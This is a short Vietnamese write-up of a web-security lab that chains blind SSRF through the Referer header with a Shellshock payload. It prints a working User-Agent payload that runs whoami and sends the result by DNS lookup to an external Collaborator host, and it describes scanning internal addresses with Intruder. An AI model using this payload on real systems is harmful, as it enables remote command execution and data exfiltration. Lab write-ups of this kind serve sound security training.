Khai thác SSRF With ShellLock **Đầu tiên ta đọc đề : ** > This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded. > > To solve the lab, use this functionality to perform a blind SSRF attack against an internal server in the 192.168.0.X range on port 8080. In the blind attack, use a Shellshock payload against the internal server to exfiltrate the name of the OS user. Đề bài yêu cầu đây là 1 dạng blind SSRF tức là tiêm mù. Mục tiêu sẽ tìm cách khai thác name của OS user bằng cách sử dụng shellock để vào localhost 192.168.0.X range on port 8080 có nghĩa X sẽ random từ 1-255 theo địa chỉ IPV4.~~~~ ![image](https://hackmd.io/_uploads/HkZG1uhbJl.png) Đây là request khi ta lựa chọn 1 sản phẩm để xem, nhưng ở bài này khi ta tìm kiếm thì không có nới nào để nhập URL để khai thác SSRF Ở đây ta có thể liên tưởng đến phần `Referer` , những bài SSRF mình từng làm thì mình có thể lợi dụng ở đây để gửi data ra bên ngoài, ở đây mình sử dụng `Collaborator` giờ mình thử xem khi sửa thì bên server ngoài có nhận dữ liệu không. ![image](https://hackmd.io/_uploads/B1yggu3Zkx.png) Thì ở đây vẫn nhận giờ tìm cách thực thi `OS Command` bằng shellock ``` () { :; }; /usr/bin/nslookup $(whoami).34586i825piedqui5m7qz5eq7hd91y.oastify.com ``` Thay thế cho phần `User-Agant` còn phần `Referer` thì mình thay thế localhost 192.168.0.X port 8080 cho việc lúc này chỉ cần tìm X , dùng Intruder tìm kiếm cho chạy từ 1-255 sau khi chạy xong vào `Collaborator` ta có được user OS ![image](https://hackmd.io/_uploads/HJehxdnZJl.png) Vậy là xong bài khai thác SSRF với shellock để RCE lệnh của server.